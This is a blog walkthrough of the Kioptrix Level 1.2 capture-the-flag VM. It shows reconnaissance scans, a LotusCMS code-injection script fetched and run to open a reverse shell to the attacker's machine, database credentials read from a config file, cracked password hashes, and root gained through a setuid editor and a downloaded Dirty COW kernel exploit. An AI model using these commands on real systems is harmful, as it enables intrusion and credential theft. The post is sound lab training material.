Posts Kioptrix Level 1.2 CTF VM WalkThrough
Post
Cancel

Kioptrix Level 1.2 CTF VM WalkThrough

VM : Kioptrix: Level 1.2 (#3)

Download Link : https://download.vulnhub.com/kioptrix/KVM3.rar

VM HOST : VMware Workstation/Player
Network : Briged mode with DHCP

Nmap Scan

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
$ nmap -A 192.168.1.5 -oN nmap.scan

# Nmap 7.80 scan initiated Sun Apr 19 14:08:17 2020 as: nmap -A -oN nmap.scan 192.168.1.5
Nmap scan report for 192.168.1.5
Host is up (0.00050s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 4.7p1 Debian 8ubuntu1.2 (protocol 2.0)
| ssh-hostkey:
|   1024 30:e3:f6:dc:2e:22:5d:17:ac:46:02:39:ad:71:cb:49 (DSA)
|_  2048 9a:82:e6:96:e4:7e:d6:a6:d7:45:44:cb:19:aa:ec:dd (RSA)
80/tcp open  http    Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch)
| http-cookie-flags:
|   /:
|     PHPSESSID:
|_      httponly flag not set
|_http-server-header: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch
|_http-title: Ligoat Security - Got Goat? Security ...
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.8 - 2.6.30
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 21/tcp)
HOP RTT     ADDRESS
1   0.04 ms 172.17.0.1
2   0.41 ms 192.168.1.5

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun Apr 19 14:08:27 2020 -- 1 IP address (1 host up) scanned in 9.80 seconds

Findings :

  • The apache web server is running on port 80.
  • SSH is running on port 22.

Checking the web app

1
2
3
4
5
6
$ python urlCroll.py http://kioptrix3.com/

http://kioptrix3.com/index.php?page=index
http://kioptrix3.com/index.php?system=Blog
http://kioptrix3.com/index.php?system=Admin
http://kioptrix3.com//gallery

Link : urlCroll.py

http://kioptrix3.com/index.php?page=index

http://kioptrix3.com/index.php?system=Admin

http://kioptrix3.com/index.php?system=Blog

Also note that the web app is using LotasCMS.

There is also a gallery app, but to access all its content map the IP address of VM to kioptrix3.con by adding it to /etc/hosts file

1
sudo echo '192.168.1.5     kioptrix3.com' >> /etc/hosts

URL of gallery app is :

1
http://kioptrix3.com/gallery  

Scanning Web Application

nikto scan output

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
$ nikto -host kioptrix3.com

- Nikto v2.1.5
---------------------------------------------------------------------------
+ Target IP:          192.168.1.5
+ Target Hostname:    kioptrix3.com
+ Target Port:        80
+ Start Time:         2020-04-20 18:46:19 (GMT5.5)
---------------------------------------------------------------------------
+ Server: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch
+ Retrieved x-powered-by header: PHP/5.2.4-2ubuntu5.6
+ The anti-clickjacking X-Frame-Options header is not present.
+ Cookie PHPSESSID created without the httponly flag
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Server leaks inodes via ETags, header found with file /favicon.ico, inode: 631780, size: 23126, mtime: 0x46b9ece7ac600
+ Apache/2.2.8 appears to be outdated (current is at least Apache/2.2.22). Apache 1.3.42 (final release) and 2.0.64 are also current.
+ PHP/5.2.4-2ubuntu5.6 appears to be outdated (current is at least 5.4.4)
+ DEBUG HTTP verb may show server debugging information. See http://msdn.microsoft.com/en-us/library/e8z01xdh%28VS.80%29.aspx for details.
+ OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST
+ OSVDB-12184: /index.php?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-3092: /phpmyadmin/changelog.php: phpMyAdmin is for managing MySQL databases, and should be protected or limited to authorized hosts.
+ OSVDB-3268: /icons/: Directory indexing found.
+ Cookie phpMyAdmin created without the httponly flag
+ OSVDB-3233: /icons/README: Apache default file found.
+ /phpmyadmin/: phpMyAdmin directory found
+ 6544 items checked: 0 error(s) and 14 item(s) reported on remote host
+ End Time:           2020-04-20 18:46:28 (GMT5.5) (9 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

phpmyadmin directory is found.

Similarly results from dirb

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
$ dirb http://kioptrix3.com | tee dirb.scan

==> DIRECTORY: http://192.168.1.5/cache/
+ http://192.168.1.5/favicon.ico (CODE:200|SIZE:23126)

==> DIRECTORY: http://192.168.1.5/core/controller/
+ http://192.168.1.5/core/index.php (CODE:200|SIZE:0)
+ http://192.168.1.5/phpmyadmin/phpinfo.php (CODE:200|SIZE:0)
+ http://kioptrix3.com/index.php (CODE:200|SIZE:1819)
+ http://kioptrix3.com/cache/index.html (CODE:200|SIZE:1819)
+ http://kioptrix3.com/core/index.php (CODE:200|SIZE:0)
+ http://kioptrix3.com/phpmyadmin/favicon.ico (CODE:200|SIZE:18902)
+ http://kioptrix3.com/phpmyadmin/index.php (CODE:200|SIZE:8136)
+ http://kioptrix3.com/phpmyadmin/phpinfo.php (CODE:200|SIZE:0)
+ http://kioptrix3.com/style/admin.php (CODE:200|SIZE:356)
+ http://kioptrix3.com/style/index.php (CODE:200|SIZE:0)
+ http://kioptrix3.com/core/controller/index.php (CODE:200|SIZE:0)
+ http://kioptrix3.com/core/lib/index.php (CODE:200|SIZE:0)
+ http://kioptrix3.com/core/model/index.php (CODE:200|SIZE:0)
+ http://kioptrix3.com/core/view/index.php (CODE:200|SIZE:0)

And also scan results from dirsearch :

1
2
3
4
5
6
7
8
9
10
11
 $ ./dirsearch.py -u http://kioptrix3.com -e php,asp,aspx,jsp,html,zip,jar,sql --plain-text-report=dirsearchReport
 
 $ cat dirsearchReport | grep 200
 
 200     2KB  http://kioptrix3.com/cache/
 200   688B   http://kioptrix3.com/core/fragments/moduleInfo.phtml
 200    23KB  http://kioptrix3.com/favicon.ico
 200     2KB  http://kioptrix3.com/index.php
 200     2KB  http://kioptrix3.com/index.php/login/
 200   146B   http://kioptrix3.com/modules/TinyMCE/TinyMCEModuleInfo.php
 200     8KB  http://kioptrix3.com/phpmyadmin/

We can access myphpadmin with deafult user admin and blank password field, but there is only information_schema is accessible with default credentials.

Exploiting Lotas CMS :

A quick search of lotasCMS vulnerability will shows that version 3.0 is vulnerable to RCE

Link : https://github.com/Hood3dRob1n/LotusCMS-Exploit

To exploit this start a listener on attack machine

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
 $ wget https://github.com/Hood3dRob1n/LotusCMS-Exploit/raw/master/lotusRCE.sh
 $ chmod +x lotusRCE.sh
 $ ./lotusRCE.sh kioptrix3.com /
 
 Path found, now to check for vuln....
 
 </html>Hood3dRob1n
 Regex found, site is vulnerable to PHP Code Injection!
 
 About to try and inject reverse shell....
 what IP to use?
 192.168.1.3      <----- IP address of local machine
 What PORT?
 1234             <---- listener port number
 
 OK, open your local listener and choose the method for back connect:
 1) NetCat -exploit    3) NetCat Backpipe5) Exit
 2) NetCat /dev/tcp  4) NetCat FIFO
 #? 1

and we get the reverse connection

1
2
3
4
Listening on [0.0.0.0] (family 0, port 1234)
Connection from kioptrix3.com 37530 received!
whoami
www-data

getting tty shell

1
2
python -c 'import pty;pty.spawn("/bin/sh")'
$

Enumerating files

Looking at web directory :

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
$ pwd
pwd
/home/www/kioptrix3.com
$ ls
cache  data    gallery  index.php  style
core   favicon.ico  gnu-lgpl.txt  modules    update.php

$ cd gallery

$ ls
BACK     gfooter.php     logout.php        readme.html    tags.php
db.sql     gfunctions.php  p.php       recent.php     themes
g.php     gheader.php     photos       register.php   version.txt
gadmin     index.php     photos.php        scopbin      vote.php
gallery.php  install.BAK     post_comment.php  search.php
gconfig.php  login.php     profile.php       slideshow.php

$ cat gconfig.php
<?php
    error_reporting(0);
    /*
        A sample Gallarific configuration file. You should edit
        the installer details below and save this file as gconfig.php
        Do not modify anything else if you don't know what it is.
    */

    // Installer Details -----------------------------------------------

    // Enter the full HTTP path to your Gallarific folder below,
    // such as http://www.yoursite.com/gallery
    // Do NOT include a trailing forward slash

    $GLOBALS["gallarific_path"] = "http://kioptrix3.com/gallery";

    $GLOBALS["gallarific_mysql_server"] = "localhost";
    $GLOBALS["gallarific_mysql_database"] = "gallery";
    $GLOBALS["gallarific_mysql_username"] = "root";
    $GLOBALS["gallarific_mysql_password"] = "fuckeyou";

In webdirectory of gallery we find database creds “root/fukeyou”, and we can successfully logged-in on myphpadmin, and on gallery database we found two usernames with hashed passwords :

1
2
 dreg         fb887aabd50f243b3f155c0f85
 loneferret   5badcaf789d3d1d09794d8f021f40f0e

Although these passwords are cracked with crackstation.net

1
2
 dreg        :  Mast3r
 loneferret  :  starwars

With user “loneferret/starwars” we can successfully ssh into the machine

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
$ ssh loneferret@192.168.1.5
loneferret@192.168.1.5's password:
Linux Kioptrix3 2.6.24-24-server #1 SMP Tue Jul 7 20:21:17 UTC 2009 i686

The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.

To access official Ubuntu documentation, please visit:
http://help.ubuntu.com/
Last login: Mon Apr 20 04:26:57 2020 from 192.168.1.3
loneferret@Kioptrix3:~$ whoami
loneferret
loneferret@Kioptrix3:~$

But with this we can’t access the root directory

1
2
loneferret@Kioptrix3:~$ cd /root
-bash: cd: /root: Permission denied

Privilege Escalation

Method 1 :

There is a file CompanyPolicy.README, which descirbe command ‘sudo ht’

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
loneferret@Kioptrix3:~$ cat CompanyPolicy.README
Hello new employee,
It is company policy here to use our newly installed software for editing, creating and viewing files.
Please use the command 'sudo ht'.
Failure to do so will result in you immediate termination.

DG
CEO
loneferret@Kioptrix3:~$ sudo ht
sudo: no passwd entry for root!

loneferret@Kioptrix3:~$ which ht
/usr/local/bin/ht

loneferret@Kioptrix3:~$ ls -al /usr/local/bin/ht
-rwsr-sr-x 1 firefart root 2072344 2011-04-16 07:26 /usr/local/bin/ht

ht is a file editor/viewer/analyzer for executables. And in this case it is setted to suid, means it runs with root privilege, and we can edit files which require to root access with it. Means we can escalate our privilege by editing etc/sudoers file and allow use loneferret to /bin/su file, which gives us root access.

Open th file By

1
sudo ht /etc/sudoers

Which looks like this

To change it into text mode press F6 and coose text mode

We have to change ‘!/usr/bin/su’ to ‘/bin/su’

To edit file change the mode into “hex” (press F6) and press F4 to edit, now just place “20” (hex for space) into the place of “!/usr” in “!/usr/bin/su”, which looks like

Before :

After :

and press F2 to save.

Now just run the command sudo su

1
2
3
loneferret@Kioptrix3:~$ sudo su
root@Kioptrix3:/home/loneferret# whoami
root

Thats it, we get the root shell!!

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
Congrats.txt  ht-2.0.18
root@Kioptrix3:~# cat Congrats.txt
Good for you for getting here.
Regardless of the matter (staying within the spirit of the game of course)
you got here, congratulations are in order. Wasn't that bad now was it.

Went in a different direction with this VM. Exploit based challenges are
nice. Helps workout that information gathering part, but sometimes we
need to get our hands dirty in other things as well.
Again, these VMs are beginner and not intented for everyone.
Difficulty is relative, keep that in mind.

The object is to learn, do some research and have a little (legal)
fun in the process.


I hope you enjoyed this third challenge.

Steven McElrea
aka loneferret
http://www.kioptrix.com


Credit needs to be given to the creators of the gallery webapp and CMS used
for the building of the Kioptrix VM3 site.

Main page CMS:
http://www.lotuscms.org

Gallery application:
Gallarific 2.1 - Free Version released October 10, 2009
http://www.gallarific.com
Vulnerable version of this application can be downloaded
from the Exploit-DB website:
http://www.exploit-db.com/exploits/15891/

The HT Editor can be found here:
http://hte.sourceforge.net/downloads.html
And the vulnerable version on Exploit-DB here:
http://www.exploit-db.com/exploits/17083/


Also, all pictures were taken from Google Images, so being part of the
public domain I used them.

root@Kioptrix3:~#

Method 2 :

We are using this method within the reverse shell obtained by LotusCMS exploit.

First check the version of OS and Kernel

1
2
3
4
5
6
7
8
9
10
11
12
13
14
$ cat /etc/issue
Ubuntu 8.04.3 LTS \n \l

$ cat /etc/*-release
DISTRIB_ID=Ubuntu
DISTRIB_RELEASE=8.04
DISTRIB_CODENAME=hardy
DISTRIB_DESCRIPTION="Ubuntu 8.04.3 LTS"

$ uname -a
Linux Kioptrix3 2.6.24-24-server #1 SMP Tue Jul 7 20:21:17 UTC 2009 i686 GNU/Linux

$ cat /proc/version
Linux version 2.6.24-24-server (buildd@palmer) (gcc version 4.2.4 (Ubuntu 4.2.4-1ubuntu4)) #1 SMP Tue Jul 7 20:21:17 UTC 2009

So the kernel version is 2.6.24, now for searching exploit for Linux kernel 2.6.24 i found following exploit : https://www.exploit-db.com/exploits/40839

According to the documentation the exploit creates a new user ‘firefart’ with root privilege, download it and test it.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
$ cd /tmp

$ wget wget 192.168.1.3:8000/exploit.c

$ gcc -pthread exploit.c -o exploit -lcrypt
exploit.c:193:2: warning: no newline at end of file

$ ./exploit
./exploit
/etc/passwd successfully backed up to /tmp/passwd.bak
Please enter the new password: 12345

Complete line:
firefart:fi3LLch28IK7A:0:0:pwned:/root:/bin/bash

mmap: b7fe0000
madvise 0

ptrace 0
Done! Check /etc/passwd to see if the new user was created.
You can log in with the username 'firefart' and the password '12345'.


DON'T FORGET TO RESTORE! $ mv /tmp/passwd.bak /etc/passwd
Done! Check /etc/passwd to see if the new user was created.
You can log in with the username 'firefart' and the password '12345'.


DON'T FORGET TO RESTORE! $ mv /tmp/passwd.bak /etc/passwd

Exploits seems to works, now try to login with new user “firefart” with password 12345

1
2
3
4
5
6
7
8
9
10
11
$ su firefart
Password: 12345

firefart@Kioptrix3:/tmp# cd /root

firefart@Kioptrix3:~# ls
Congrats.txt  ht-2.0.18

firefart@Kioptrix3:~# cat Congrats.txt
Good for you for getting here.
Regardless of the matter (staying within the spirit of the game of course)

We can access the /root directory.

This post is licensed under CC BY 4.0 by the author.
Contents